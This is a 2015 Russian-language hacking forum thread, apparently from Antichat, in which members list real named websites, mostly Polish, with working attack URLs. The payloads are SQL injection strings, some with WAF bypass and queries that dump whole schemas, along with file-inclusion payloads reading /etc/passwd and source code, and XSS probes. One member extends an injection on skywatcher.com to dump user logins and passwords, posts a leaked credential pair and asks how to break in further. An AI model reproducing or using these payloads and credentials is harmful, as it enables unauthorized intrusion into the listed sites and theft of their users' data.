30.09.2015, 22:24
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Ну-с попробуем хД
Сайт: przedszkolefelicjanek.pl
Уязвимость: SQLi
Эксплоит:
Код:
https://przedszkolefelicjanek.pl/index.php?action=2%20union%20select%20@@Version,2%20--
Сайт: krapik.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.krapik.pl/index.php?action=2&id=30%27%20union%20select%201,2,3,4,5,6,version%28%29,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20%20%20--%20%27and%201=1
Сайт: dobrawola.org.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.dobrawola.org.pl/index.php?action=2%20union%20select%201,version%28%29,3,user%28%29,5,6,7,8
Сайт: izba-lekarska.org.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.izba-lekarska.org.pl/stara_strona/index.php?mid=1&sid=54;select+version%28%29::int--
Сайт: inter-system.com.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.inter-system.com.pl/content.php?id=4;select+version%28%29::int--&ids=362
Сайт: przygodywoblokach.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.przygodywoblokach.pl/content.php?id=23;select+version%28%29::int--&ids=362&ids=18
Сайт: fundacjafilmowa.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://www.fundacjafilmowa.pl/print.php?id=142;select+version%28%29::int--
Сайт: wk-nieruchomosci.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://wk-nieruchomosci.pl/print.php?id=6%20union%20select%201,2,3,version%28%29,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18
Сайт: gamepat.de
Уязвимость: RFI
Эксплоит:
Код:
http://gamepat.de/portfolio/index.php?link=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgcGhwaW5mbygpOyA%2FPg%20%20
Сайт: everybyte.nl
Уязвимость: IFRAME Injection
Эксплоит:
Код:
http://www.everybyte.nl/index.php?x=http://google.com
Сайт: dzienziemi.org.pl
Уязвимость: LFI
Эксплоит:
Код:
http://www.dzienziemi.org.pl/2015/index.php?m=hi&pm=../../../../../../etc/passwd
Сайт: festus.pl
Уязвимость: XSS (поганенькая, но в торе отработала)
Эксплоит:
Код:
http://www.festus.pl/search.htm?qt=%3Cscript%3Ealert%28%29;%3C/script%3E&szukaj.x=12&szukaj.y=10&lang=pl
|
|
|
04.10.2015, 16:36
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Сайт: endividado.com.br
Уязвимость: SQLi
Эксплоит (с обходом WAF):
Код:
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+
UPD DIOS
Код:
http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8,9,10,11,12,13,14--+
|
|
|
|
06.10.2015, 19:51
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Сайт: www2.ufpel.edu.br
Уязвимость: AFR или LFI (как правильно, подскажите?)
Эксплоит:
Код:
http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index
|
|
|
|
07.10.2015, 08:05
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сайт: http://igrek.amzp.pl
Уязвимость: SQLi
Эксплоит:
Код:
http://igrek.amzp.pl/details.php?id=-11768531+UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+
Сайт: humweb.ucsc.edu
Уязвимость: SQLi
Эксплоит:
Код:
http://humweb.ucsc.edu/mediterraneanseminar/news/index.php?id=-236'+UNION+ALL+SELECT+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6 --+
Сайт: http://nightgallery.ca
Уязвимость: SQLi
Эксплоит:
Код:
http://nightgallery.ca/event.php?id=-91+UNION+ALL+SELECT+1,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --+
Сайт: http://reviewedporn.com
Уязвимость: XSS (там их куча)
Эксплоит:
Код:
http://reviewedporn.com/cat/gangbang?orderby=toprated&page=2">prompt(909661)
Сайт: http://www.guessthespot.com
Уязвимость: SQLi
Эксплоит:
Код:
http://www.guessthespot.com/index.php?cat_id=-3%20+UNION+ALL+SELECT+1,2,3,export_set%285,@:=0,%28select+count%28*%29/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set%285,export_set%285,@,0x3c6c693e,/*!50000column_name*/,2%29,0x3a3a,/*!50000table_name*/,2%29%29,@,2%29,5,6,7,8%20--
Сайт: http://www.rotawheels.com
Уязвимость: SQLi
Эксплоит:
Код:
http://www.rotawheels.com/news.php?id=5 +UNION+ALL+SELECT+1,2,(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@)),4,5--
Сайт: http://www.cese.utulsa.edu
Уязвимость: SQLi
Эксплоит:
Код:
http://www.cese.utulsa.edu/programdetail.php?ID=-127 +UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9 --
Сайт: http://www.freepoc.org
Уязвимость: SQLi
Эксплоит:
Код:
http://www.freepoc.org/viewapp.php?id=32 +UNION+ALL+SELECT+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--
Сайт: http://www.clanwilliam.info
Уязвимость: SQLi
Эксплоит:
Код:
http://www.clanwilliam.info/index.php?id=-1 +UNION+ALL+SELECT+1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7 --
|
|
|
|
10.10.2015, 22:33
|
|
Новичок
Регистрация: 01.08.2015
Сообщений: 3
С нами:
5676086
Репутация:
0
|
|
Сайт: http://www.sunmedi.co.kr/
Уязвимость: SQLi
Эксплоит:
Код:
http://www.sunmedi.co.kr/EOrder/index.asp?ShopID=nunbo0808' or 1=[t] and '1'='1
Сайт: http://www.wzxsc.net/
Уязвимость: SQLi
Эксплоит:
Код:
http://www.wzxsc.net/category.php?catid=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Сайт: http://skywatcher.com/
Уязвимость: SQLi
Эксплоит:
Код:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
Сайт: http://www.terraforza.nl/
Уязвимость: SQLi
Эксплоит:
Код:
http://www.terraforza.nl/index.php?catid=79' and [t] and '1'='1
Сайт: http://www.dgn.co.th/
Уязвимость: SQLi
Эксплоит:
Код:
http://www.dgn.co.th/product-view.php?product_ID=999999.9' union all select 1,[t],3,4 and '0'='0
Сайт: http://www.ampak.com.tw/
Уязвимость: SQLi
Эксплоит:
Код:
http://www.ampak.com.tw/product_list.php?cid=[t]
|
|
|
|
12.10.2015, 02:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от AlexG
↑
Сайт: www2.ufpel.edu.br
Уязвимость: LFR или AFR? (подскажите как правильно?)
Эксплоит:
Код:
http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index
все-таки тут AFR через RFI. всем, кто писал, добавил, если что-то в таблице не так, пишите в лс. AlexG проходит
|
|
|
|
12.10.2015, 10:23
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сообщение от antikonstantin
↑
http://skywatcher.com/downloads.php?cat=999999.9
union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
Код:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
Код:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
|
|
|
|
12.10.2015, 12:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от ubepkr
↑
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
Код:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
Код:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте
|
|
|
|
12.10.2015, 17:03
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Сообщение от ubepkr
↑
Привет!
Писал вчера ответ, но его кто-то съел))
Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
Код:
http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
Админку не нашел известными мне способами, но есть вот это:
Код:
http://skywatcher.com/_db_backups/.htaccess
где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
в котором, соответственно, "skyw1042:RMyP86leOB18k".
Дальше вот затупил, что делать.
|
|
|
|
12.10.2015, 19:46
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сообщение от yarbabin
↑
здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте
Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.
grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
